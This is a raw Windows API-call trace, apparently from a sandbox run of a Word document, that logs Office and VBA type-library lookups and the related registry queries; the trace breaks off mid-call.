[0030.024] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="Normal", lHashVal=0x10d8df, pfName=0x2e6420, pBstrLibName=0x2e6350 | out: pfName=0x2e6420*=0, pBstrLibName=0x2e6350) returned 0x0 [0030.024] IUnknown:Release (This=0x782a220) returned 0x2 [0030.024] IUnknown:AddRef (This=0x731da90) returned 0x3 [0030.024] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="Normal", lHashVal=0x10d8df, pfName=0x2e6420, pBstrLibName=0x2e6350 | out: pfName=0x2e6420*=0, pBstrLibName=0x2e6350) returned 0x0 [0030.024] IUnknown:Release (This=0x731da90) returned 0x2 [0030.024] IUnknown:AddRef (This=0x731cc80) returned 0x5 [0030.024] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="Normal", lHashVal=0x10d8df, pfName=0x2e6420, pBstrLibName=0x2e6350 | out: pfName=0x2e6420*=0, pBstrLibName=0x2e6350) returned 0x0 [0030.024] IUnknown:Release (This=0x731cc80) returned 0x4 [0030.024] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76d6800 [0030.024] IMalloc:Free (This=0x7fefe015380, pv=0x78069c0) [0030.024] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x766d110 [0030.024] IMalloc:Free (This=0x7fefe015380, pv=0x76d6800) [0030.025] IMalloc:Alloc (This=0x7fefe015380, cb=0x9a) returned 0x771dd40 [0030.026] IMalloc:Free (This=0x7fefe015380, pv=0x771dd40) [0030.026] IMalloc:Alloc (This=0x7fefe015380, cb=0x8c) returned 0x7753720 [0030.026] _ultow_s (in: _Value=0x2, _Buffer=0x2e667a, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0030.026] _ultow_s (in: _Value=0x8, _Buffer=0x2e667e, _BufferCount=0xe, _Radix=16 | out: _Buffer="8") returned 0x0 [0030.027] _ultow_s (in: _Value=0x0, _Buffer=0x2e6682, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0030.027] wcscpy_s (in: _Destination=0x7822068, _SizeInWords=0x9b, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0030.027] wcscpy_s (in: _Destination=0x782206e, _SizeInWords=0x98, _Source="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}" | out: _Destination="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 0x0 [0030.027] wcscpy_s (in: _Destination=0x78220ba, _SizeInWords=0x72, _Source="#2.8#0#" | out: _Destination="#2.8#0#") returned 0x0 [0030.027] wcscpy_s (in: _Destination=0x78220c8, _SizeInWords=0x6b, _Source="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0030.027] wcscpy_s (in: _Destination=0x7822154, _SizeInWords=0x25, _Source="Microsoft Office 16.0 Object Library" | out: _Destination="Microsoft Office 16.0 Object Library") returned 0x0 [0030.027] IMalloc:Free (This=0x7fefe015380, pv=0x7753720) [0030.028] wcscpy_s (in: _Destination=0xb4209d0, _SizeInWords=0x9b, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0030.028] wcsncpy_s (in: _Destination=0x2e6440, _SizeInWords=0x108, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0030.028] CharLowerBuffW (in: lpsz="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchLength=0x9a | out: lpsz="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library") returned 0x9a [0030.028] IMalloc:Alloc (This=0x7fefe015380, cb=0x136) returned 0x7756140 [0030.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", cchWideChar=155, lpMultiByteStr=0x7756140, cbMultiByte=310, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", lpUsedDefaultChar=0x0) returned 155 [0030.028] IMalloc:Free (This=0x7fefe015380, pv=0x7756140) [0030.028] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 4 [0030.030] wcscpy_s (in: _Destination=0x54f1980, _SizeInWords=0x9b, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0030.030] wcsncpy_s (in: _Destination=0x2e6480, _SizeInWords=0x108, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0030.030] CharLowerBuffW (in: lpsz="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchLength=0x9a | out: lpsz="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library") returned 0x9a [0030.030] IMalloc:Alloc (This=0x7fefe015380, cb=0x136) returned 0x7756140 [0030.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", cchWideChar=155, lpMultiByteStr=0x7756140, cbMultiByte=310, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library", lpUsedDefaultChar=0x0) returned 155 [0030.030] IMalloc:Free (This=0x7fefe015380, pv=0x7756140) [0030.031] wcsncpy_s (in: _Destination=0x2e6440, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0x0 [0030.031] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", cchLength=0x27 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc") returned 0x27 [0030.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", cchWideChar=40, lpMultiByteStr=0x2e6370, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", lpUsedDefaultChar=0x0) returned 40 [0030.031] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _String2="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned -4 [0030.031] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0 [0030.031] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Office") returned 0x107515 [0030.031] strcpy_s (in: _Dst=0x2e6500, _DstSize=0x7, _Src="Office" | out: _Dst="Office") returned 0x0 [0030.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e6500, cbMultiByte=7, lpWideCharStr=0x2e6350, cchWideChar=7 | out: lpWideCharStr="Office") returned 7 [0030.032] IUnknown:AddRef (This=0x782a220) returned 0x3 [0030.032] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="Office", lHashVal=0x107515, pfName=0x2e6420, pBstrLibName=0x2e6350 | out: pfName=0x2e6420*=0, pBstrLibName=0x2e6350) returned 0x0 [0030.032] IUnknown:Release (This=0x782a220) returned 0x2 [0030.032] IUnknown:AddRef (This=0x731da90) returned 0x3 [0030.032] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="Office", lHashVal=0x107515, pfName=0x2e6420, pBstrLibName=0x2e6350 | out: pfName=0x2e6420*=0, pBstrLibName=0x2e6350) returned 0x0 [0030.032] IUnknown:Release (This=0x731da90) returned 0x2 [0030.032] IUnknown:AddRef (This=0x731cc80) returned 0x5 [0030.032] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="Office", lHashVal=0x107515, pfName=0x2e6420, pBstrLibName=0x2e6350 | out: pfName=0x2e6420*=0, pBstrLibName=0x2e6350) returned 0x0 [0030.032] IUnknown:Release (This=0x731cc80) returned 0x4 [0030.032] IMalloc:Alloc (This=0x7fefe015380, cb=0x208) returned 0x2d28370 [0030.033] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x2e5b00 | out: phkResult=0x2e5b00*=0xa16) returned 0x0 [0030.033] RegOpenKeyW (in: hKey=0xa16, lpSubKey="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}", phkResult=0x2e5af8 | out: phkResult=0x2e5af8*=0xa1a) returned 0x0 [0030.034] RegEnumKeyW (in: hKey=0xa1a, dwIndex=0x0, lpName=0x2e5b28, cchName=0xa | out: lpName="2.6") returned 0x0 [0030.035] RegEnumKeyW (in: hKey=0xa1a, dwIndex=0x1, lpName=0x2e5b28, cchName=0xa | out: lpName="2.7") returned 0x0 [0030.035] RegEnumKeyW (in: hKey=0xa1a, dwIndex=0x2, lpName=0x2e5b28, cchName=0xa | out: lpName="2.8") returned 0x0 [0030.036] wcscpy_s (in: _Destination=0x2e5b10, _SizeInWords=0xa, _Source="2.8" | out: _Destination="2.8") returned 0x0 [0030.036] RegOpenKeyW (in: hKey=0xa1a, lpSubKey="2.8", phkResult=0x2e5bb8 | out: phkResult=0x2e5bb8*=0xa2e) returned 0x0 [0030.037] _ultoa_s (in: _Val=0x0, _DstBuf=0x2e5b30, _Size=0xa, _Radix=16 | out: _DstBuf="0") returned 0x0 [0030.037] RegOpenKeyA (in: hKey=0xa2e, lpSubKey="0", phkResult=0x2e5b20 | out: phkResult=0x2e5b20*=0xa36) returned 0x0 [0030.037] RegOpenKeyW (in: hKey=0xa36, lpSubKey="win64", phkResult=0x2e5b28 | out: phkResult=0x2e5b28*=0xa3e) returned 0x0 [0030.038] RegCloseKey (hKey=0xa3e) returned 0x0 [0030.039] RegCloseKey (hKey=0xa36) returned 0x0 [0030.039] _ultow_s (in: _Value=0x0, _Buffer=0x2e5bc0, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0030.039] RegOpenKeyW (in: hKey=0xa2e, lpSubKey="0", phkResult=0x2e5b98 | out: phkResult=0x2e5b98*=0xa32) returned 0x0 [0030.039] RegQueryValueW (in: hKey=0xa32, lpSubKey="win64", lpData=0x2e5be0, lpcbData=0x2e5b94 | out: lpData="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", lpcbData=0x2e5b94) returned 0x0 [0030.041] wcscpy_s (in: _Destination=0x2d28370, _SizeInWords=0x104, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0030.041] RegCloseKey (hKey=0xa32) returned 0x0 [0030.041] RegCloseKey (hKey=0xa2e) returned 0x0 [0030.041] RegCloseKey (hKey=0xa1a) returned 0x0 [0030.041] RegCloseKey (hKey=0xa16) returned 0x0 [0030.070] IUnknown:QueryInterface (in: This=0x7829f50, riid=0x7fee3a76290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e6008 | out: ppvObject=0x2e6008*=0x0) returned 0x80004002 [0030.070] ITypeLib:RemoteGetLibAttr (in: This=0x7829f50, ppTLibAttr=0x2e6000, pDummy=0x10 | out: ppTLibAttr=0x2e6000, pDummy=0x10) returned 0x0 [0030.070] ITypeLib:RemoteGetDocumentation (in: This=0x7829f50, index=-1, refPtrFlags=0x0, pBstrName=0x2e5ff8, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x7363956 | out: pBstrName=0x2e5ff8*="Microsoft Office 16.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x7363956) returned 0x0 [0030.070] StringFromGUID2 (in: rguid=0x766cae0*(Data1=0x2df8d04c, Data2=0x5bfa, Data3=0x101b, Data4=([0]=0xbd, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0xde, [7]=0x52)), lpsz=0x2e6020, cchMax=39 | out: lpsz="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 39 [0030.070] _ultow_s (in: _Value=0x2, _Buffer=0x2e5f6a, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0030.070] _ultow_s (in: _Value=0x8, _Buffer=0x2e5f6e, _BufferCount=0xe, _Radix=16 | out: _Buffer="8") returned 0x0 [0030.070] _ultow_s (in: _Value=0x0, _Buffer=0x2e5f72, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0030.070] wcscpy_s (in: _Destination=0x7822c38, _SizeInWords=0x95, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0030.070] wcscpy_s (in: _Destination=0x7822c3e, _SizeInWords=0x92, _Source="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}" | out: _Destination="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 0x0 [0030.070] wcscpy_s (in: _Destination=0x7822c8a, _SizeInWords=0x6c, _Source="#2.8#0#" | out: _Destination="#2.8#0#") returned 0x0 [0030.070] wcscpy_s (in: _Destination=0x7822c98, _SizeInWords=0x65, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0030.070] wcscpy_s (in: _Destination=0x7822d18, _SizeInWords=0x25, _Source="Microsoft Office 16.0 Object Library" | out: _Destination="Microsoft Office 16.0 Object Library") returned 0x0 [0030.070] ITypeLib:LocalReleaseTLibAttr (This=0x7829f50) returned 0x0 [0030.070] wcscpy_s (in: _Destination=0xb4c6648, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0030.070] IMalloc:Free (This=0x7fefe015380, pv=0x2d28370) [0030.070] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="Office", lHashVal=0x107515, pfName=0x2e6420, pBstrLibName=0x2e6350 | out: pfName=0x2e6420*=0, pBstrLibName=0x2e6350) returned 0x0 [0030.070] IUnknown:Release (This=0x7829f50) returned 0x1 [0030.070] IMalloc:Alloc (This=0x7fefe015380, cb=0x3c) returned 0x76040d0 [0030.070] IMalloc:Free (This=0x7fefe015380, pv=0x77726a0) [0030.070] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7669840 [0030.070] IMalloc:Free (This=0x7fefe015380, pv=0x76040d0) [0030.071] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7837780 [0030.071] IMalloc:Free (This=0x7fefe015380, pv=0x7837780) [0030.071] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x2e6190 | out: phkResult=0x2e6190*=0xa26) returned 0x0 [0030.074] RegOpenKeyW (in: hKey=0xa26, lpSubKey="{000204EF-0000-0000-C000-000000000046}", phkResult=0x2e6188 | out: phkResult=0x2e6188*=0xa2a) returned 0x0 [0030.074] RegEnumKeyW (in: hKey=0xa2a, dwIndex=0x0, lpName=0x2e61b8, cchName=0xa | out: lpName="2.1") returned 0x0 [0030.074] RegEnumKeyW (in: hKey=0xa2a, dwIndex=0x1, lpName=0x2e61b8, cchName=0xa | out: lpName="4.2") returned 0x0 [0030.074] wcscpy_s (in: _Destination=0x2e61a0, _SizeInWords=0xa, _Source="4.2" | out: _Destination="4.2") returned 0x0 [0030.074] RegOpenKeyW (in: hKey=0xa2a, lpSubKey="4.2", phkResult=0x2e6248 | out: phkResult=0x2e6248*=0xa32) returned 0x0 [0030.074] _ultoa_s (in: _Val=0x9, _DstBuf=0x2e61c0, _Size=0xa, _Radix=16 | out: _DstBuf="9") returned 0x0 [0030.074] RegOpenKeyA (in: hKey=0xa32, lpSubKey="9", phkResult=0x2e61b0 | out: phkResult=0x2e61b0*=0xa36) returned 0x0 [0030.075] RegOpenKeyW (in: hKey=0xa36, lpSubKey="win64", phkResult=0x2e61b8 | out: phkResult=0x2e61b8*=0xa3a) returned 0x0 [0030.075] RegCloseKey (hKey=0xa3a) returned 0x0 [0030.075] RegCloseKey (hKey=0xa36) returned 0x0 [0030.075] _ultow_s (in: _Value=0x9, _Buffer=0x2e6250, _BufferCount=0x9, _Radix=16 | out: _Buffer="9") returned 0x0 [0030.075] RegOpenKeyW (in: hKey=0xa32, lpSubKey="9", phkResult=0x2e6228 | out: phkResult=0x2e6228*=0xa36) returned 0x0 [0030.075] RegQueryValueW (in: hKey=0xa36, lpSubKey="win64", lpData=0x2e6270, lpcbData=0x2e6224 | out: lpData="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL", lpcbData=0x2e6224) returned 0x0 [0030.075] wcscpy_s (in: _Destination=0x2e6520, _SizeInWords=0x104, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0030.075] RegCloseKey (hKey=0xa36) returned 0x0 [0030.076] RegCloseKey (hKey=0xa32) returned 0x0 [0030.076] RegCloseKey (hKey=0xa2a) returned 0x0 [0030.076] RegCloseKey (hKey=0xa26) returned 0x0 [0030.076] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x2e6190 | out: phkResult=0x2e6190*=0xa26) returned 0x0 [0030.076] RegOpenKeyW (in: hKey=0xa26, lpSubKey="{00020905-0000-0000-C000-000000000046}", phkResult=0x2e6188 | out: phkResult=0x2e6188*=0xa2e) returned 0x0 [0030.076] RegEnumKeyW (in: hKey=0xa2e, dwIndex=0x0, lpName=0x2e61b8, cchName=0xa | out: lpName="8.7") returned 0x0 [0030.076] wcscpy_s (in: _Destination=0x2e61a0, _SizeInWords=0xa, _Source="8.7" | out: _Destination="8.7") returned 0x0 [0030.076] RegOpenKeyW (in: hKey=0xa2e, lpSubKey="8.7", phkResult=0x2e6248 | out: phkResult=0x2e6248*=0xa36) returned 0x0 [0030.077] _ultoa_s (in: _Val=0x0, _DstBuf=0x2e61c0, _Size=0xa, _Radix=16 | out: _DstBuf="0") returned 0x0 [0030.077] RegOpenKeyA (in: hKey=0xa36, lpSubKey="0", phkResult=0x2e61b0 | out: phkResult=0x2e61b0*=0xa3e) returned 0x0 [0030.077] RegOpenKeyW (in: hKey=0xa3e, lpSubKey="win64", phkResult=0x2e61b8 | out: phkResult=0x2e61b8*=0xa46) returned 0x0 [0030.077] RegCloseKey (hKey=0xa46) returned 0x0 [0030.077] RegCloseKey (hKey=0xa3e) returned 0x0 [0030.077] _ultow_s (in: _Value=0x0, _Buffer=0x2e6250, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0030.077] RegOpenKeyW (in: hKey=0xa36, lpSubKey="0", phkResult=0x2e6228 | out: phkResult=0x2e6228*=0xa3a) returned 0x0 [0030.077] RegQueryValueW (in: hKey=0xa3a, lpSubKey="win64", lpData=0x2e6270, lpcbData=0x2e6224 | out: lpData="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", lpcbData=0x2e6224) returned 0x0 [0030.078] wcscpy_s (in: _Destination=0x2e6520, _SizeInWords=0x104, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0030.078] RegCloseKey (hKey=0xa3a) returned 0x0 [0030.078] RegCloseKey (hKey=0xa36) returned 0x0 [0030.078] RegCloseKey (hKey=0xa2e) returned 0x0 [0030.078] RegCloseKey (hKey=0xa26) returned 0x0 [0030.078] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x2e6190 | out: phkResult=0x2e6190*=0xa26) returned 0x0 [0030.078] RegOpenKeyW (in: hKey=0xa26, lpSubKey="{00020430-0000-0000-C000-000000000046}", phkResult=0x2e6188 | out: phkResult=0x2e6188*=0xa2e) returned 0x0 [0030.078] RegEnumKeyW (in: hKey=0xa2e, dwIndex=0x0, lpName=0x2e61b8, cchName=0xa | out: lpName="1.0") returned 0x0 [0030.078] RegEnumKeyW (in: hKey=0xa2e, dwIndex=0x1, lpName=0x2e61b8, cchName=0xa | out: lpName="2.0") returned 0x0 [0030.078] wcscpy_s (in: _Destination=0x2e61a0, _SizeInWords=0xa, _Source="2.0" | out: _Destination="2.0") returned 0x0 [0030.078] RegOpenKeyW (in: hKey=0xa2e, lpSubKey="2.0", phkResult=0x2e6248 | out: phkResult=0x2e6248*=0xa2a) returned 0x0 [0030.079] _ultoa_s (in: _Val=0x0, _DstBuf=0x2e61c0, _Size=0xa, _Radix=16 | out: _DstBuf="0") returned 0x0 [0030.079] RegOpenKeyA (in: hKey=0xa2a, lpSubKey="0", phkResult=0x2e61b0 | out: phkResult=0x2e61b0*=0xa36) returned 0x0 [0030.079] RegOpenKeyW (in: hKey=0xa36, lpSubKey="win64", phkResult=0x2e61b8 | out: phkResult=0x2e61b8*=0xa32) returned 0x0 [0030.079] RegCloseKey (hKey=0xa32) returned 0x0 [0030.079] RegCloseKey (hKey=0xa36) returned 0x0 [0030.079] _ultow_s (in: _Value=0x0, _Buffer=0x2e6250, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0030.079] RegOpenKeyW (in: hKey=0xa2a, lpSubKey="0", phkResult=0x2e6228 | out: phkResult=0x2e6228*=0xa36) returned 0x0 [0030.079] RegQueryValueW (in: hKey=0xa36, lpSubKey="win64", lpData=0x2e6270, lpcbData=0x2e6224 | out: lpData="C:\\Windows\\system32\\stdole2.tlb", lpcbData=0x2e6224) returned 0x0 [0030.080] wcscpy_s (in: _Destination=0x2e6520, _SizeInWords=0x104, _Source="C:\\Windows\\system32\\stdole2.tlb" | out: _Destination="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0030.080] RegCloseKey (hKey=0xa36) returned 0x0 [0030.080] RegCloseKey (hKey=0xa2a) returned 0x0 [0030.080] RegCloseKey (hKey=0xa2e) returned 0x0 [0030.080] RegCloseKey (hKey=0xa26) returned 0x0 [0030.080] _wfullpath (in: _Buffer=0x2e6520, _Path="Normal", _BufferCount=0x104 | out: _Buffer="C:\\Users\\aETAdzjz\\Desktop\\Normal") returned="C:\\Users\\aETAdzjz\\Desktop\\Normal" [0030.081] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x2e6190 | out: phkResult=0x2e6190*=0xa26) returned 0x0 [0030.081] RegOpenKeyW (in: hKey=0xa26, lpSubKey="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}", phkResult=0x2e6188 | out: phkResult=0x2e6188*=0xa2a) returned 0x0 [0030.081] RegEnumKeyW (in: hKey=0xa2a, dwIndex=0x0, lpName=0x2e61b8, cchName=0xa | out: lpName="2.6") returned 0x0 [0030.081] RegEnumKeyW (in: hKey=0xa2a, dwIndex=0x1, lpName=0x2e61b8, cchName=0xa | out: lpName="2.7") returned 0x0 [0030.081] RegEnumKeyW (in: hKey=0xa2a, dwIndex=0x2, lpName=0x2e61b8, cchName=0xa | out: lpName="2.8") returned 0x0 [0030.081] wcscpy_s (in: _Destination=0x2e61a0, _SizeInWords=0xa, _Source="2.8" | out: _Destination="2.8") returned 0x0 [0030.081] RegOpenKeyW (in: hKey=0xa2a, lpSubKey="2.8", phkResult=0x2e6248 | out: phkResult=0x2e6248*=0xa32) returned 0x0 [0030.082] _ultoa_s (in: _Val=0x0, _DstBuf=0x2e61c0, _Size=0xa, _Radix=16 | out: _DstBuf="0") returned 0x0 [0030.082] RegOpenKeyA (in: hKey=0xa32, lpSubKey="0", phkResult=0x2e61b0 | out: phkResult=0x2e61b0*=0xa3e) returned 0x0 [0030.082] RegOpenKeyW (in: hKey=0xa3e, lpSubKey="win64", phkResult=0x2e61b8 | out: phkResult=0x2e61b8*=0xa46) returned 0x0 [0030.082] RegCloseKey (hKey=0xa46) returned 0x0 [0030.082] RegCloseKey (hKey=0xa3e) returned 0x0 [0030.082] _ultow_s (in: _Value=0x0, _Buffer=0x2e6250, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0030.082] RegOpenKeyW (in: hKey=0xa32, lpSubKey="0", phkResult=0x2e6228 | out: phkResult=0x2e6228*=0xa3a) returned 0x0 [0030.082] RegQueryValueW (in: hKey=0xa3a, lpSubKey="win64", lpData=0x2e6270, lpcbData=0x2e6224 | out: lpData="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", lpcbData=0x2e6224) returned 0x0 [0030.083] wcscpy_s (in: _Destination=0x2e6520, _SizeInWords=0x104, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0030.083] RegCloseKey (hKey=0xa3a) returned 0x0 [0030.083] RegCloseKey (hKey=0xa32) returned 0x0 [0030.083] RegCloseKey (hKey=0xa2a) returned 0x0 [0030.083] RegCloseKey (hKey=0xa26) returned 0x0 [0030.083] wcscpy_s (in: _Destination=0xb4c6510, _SizeInWords=0x70, _Source="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\SysWOW64\\FM20.DLL#Microsoft Forms 2.0 Object Library" | out: _Destination="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\SysWOW64\\FM20.DLL#Microsoft Forms 2.0 Object Library") returned 0x0 [0030.083] wcsncpy_s (in: _Destination=0x2e6430, _SizeInWords=0x108, _Source="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\SysWOW64\\FM20.DLL#Microsoft Forms 2.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\SysWOW64\\FM20.DLL#Microsoft Forms 2.0 Object Library") returned 0x0 [0030.083] CharLowerBuffW (in: 